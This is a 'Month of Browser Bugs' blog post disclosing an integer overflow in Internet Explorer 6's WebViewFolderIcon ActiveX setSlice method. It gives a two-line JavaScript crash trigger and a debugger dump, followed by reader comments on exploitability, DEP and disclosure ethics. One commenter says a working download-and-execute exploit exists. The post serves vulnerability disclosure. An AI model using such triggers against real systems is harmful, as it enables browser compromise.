MoBB #18: WebViewFolderIcon setSlice
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the setSlice() method with the first argument set to 0x7fffffff triggers an invalid memory copy.
var a = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
a.setSlice(0x7fffffff, 0, 0x41424344, 0);
Demonstration
eax=00000010 ebx=001e4940 ecx=00000004
edx=7c97c0d8 esi=0013b188 edi=fffffff0
eip=773e0ba3 esp=0013b14c ebp=0013b158
comctl32!DSA_SetItem+0x60:
773e0ba3 f3a5 rep movsd ds:0013b188=41424344 es:fffffff0=????????
This bug will be added to the OSVDB:
Microsoft IE WebViewFolderIcon setSlice Integer Overflow
posted by hdm @ 8:39 AM
19 comments
links to this post
19 Comments:
OSVDB calls this "integer underflow" but this looks more like an "integer overflow" to a very large negative number. What's your call? How would you define "integer underflow"?
I originally chose 'underflow' for some vague and probably not rational reason, overflow does make more sense in this context. A friend of mine confirmed that this bug is exploitable.
Hdm this is a overflow condition , And yes it surely is Exploitable. Lets hope that ms doesnt take their usual 6months period to patch this one.
This works on IE 7.0 Beta 2 too!
Keep these ActiveX '0' day's coming - they totally vindicate my decision to implement 'ActiveX CLSID whitelisting' within the organisation I work for despite management whinging about ActiveX control and the perceived problems my approach would cause.
If only M$ would push the benefits of it more... they never recommend it as a 'workaround' to this sort of issue....
get a life people. instead of spending your days unethically looking for flaws in software to exploit, get off your butt and exercise. especially you hd moore.
Heh :-) Unethically? Explain.
why is object.setSlice is used for?
and why only this
WebViewFolderIcon.WebViewFolderIcon.1 ActiveX
causes the explorer crash?
wht is the use of object.Setslice?
This does not work on IE7+ / Vista 5472.
CERT post this..
Public Exploit Code for Microsoft WebViewFolderIcon ActiveX Control Vulnerability
http://www.us-cert.gov/current/current_activity.html#exwbfldr
Hay guys!
http://www.us-cert.gov/current/index.html#exwbfldr
Please test this with XP's SP2 software DEP setting enabled with NO exceptions and tell me what happens.
IE6 SP2 ask me by secure bar if I want run this following adds-on WebView shell. So SP2 protect me because I can decide if run it or not and if I trust in this site.
IE7 is not vulnerable
STFU about telling homeboy he's unethical. He reported it, posted it, and it doing it in a right way. Do you know how many people land high paying jobs, doing exactly what he's doing? So stfu "MR. ANONYMOUS" You're a piece of s***
GJ Moore... keep up the good work!!!
get a life people. instead of spending your days posting comments anonymously, get off your butt and exercise. especially you anonymous commenter #5.
Does this affect XP SP2 with software DEP setting enabled with NO exceptions or not?
What is the point of these exploit posts if you are not going to provide answers to simple security questions?
Is the intention to provide better security or to simply get back at Microsoft?
It is a very simple question that I think someone should be able to provide.
Since this is such a simple question, please enable DEP with no exceptions, try the exploit, and post a comment with your results. The point of this exploit is to exploit systems using a bug found over three months ago. Exploits are useful for a variety reasons (and to a wide range of people). If you don't find them useful, don't use them :-)
the setSlice sploit that i've got works splendidly with its download and execute shellcode when DEP is enabled.
nice work, HD.
Post a Comment
Links to this post:
Create a Link
<< Home